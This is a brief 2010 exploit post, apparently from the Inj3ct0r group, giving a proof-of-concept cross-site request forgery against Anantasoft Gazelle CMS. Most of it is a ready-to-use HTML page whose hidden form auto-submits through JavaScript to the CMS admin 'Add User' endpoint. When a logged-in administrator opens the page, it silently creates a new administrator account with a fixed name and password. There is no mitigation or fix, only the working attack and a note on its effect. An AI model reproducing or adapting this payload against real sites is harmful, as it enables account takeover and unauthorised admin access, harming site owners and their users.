Anantasoft Gazelle CMS CSRF Vulnerability
Posted on 10 March 2010
========================================= Anantasoft Gazelle CMS CSRF Vulnerability ========================================= # Software Anantasoft_Gazelle_CMS # Category CMS / Portals # Plateform php # Proof of concept # Targeted URL: http://server/demo/2/193/Anantasoft_Gazelle_CMS Script to Add the Admin user through Cross Site request forgery . ................................................................................................................ <html> <body> <form name="XYZ" action="http://server/gazelle/admin/index.php?Users/Add%20User" method="post"> <input type=hidden name="name" value="master"> <input type=hidden name="pass" value="master"> <input type=hidden name="controle" value="master"> <input type=hidden name="email" value="master%40yahoo.com"> <input type=hidden name="active" value="on"> <input type=hidden name="showemail" value="on"> <input type=hidden name="admin%5B%5D" value="2"> <input type=hidden name="save" value="Add"> <input type=hidden name="table" value="users"> <input type=hidden name="joindate" value="2010-03-10+04%3A04%3A36"> </form> <script> document.XYZ.submit(); </script> </body> </html> . .................................................................................................................. After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege. # ~ - [ [ : Inj3ct0r : ] ]
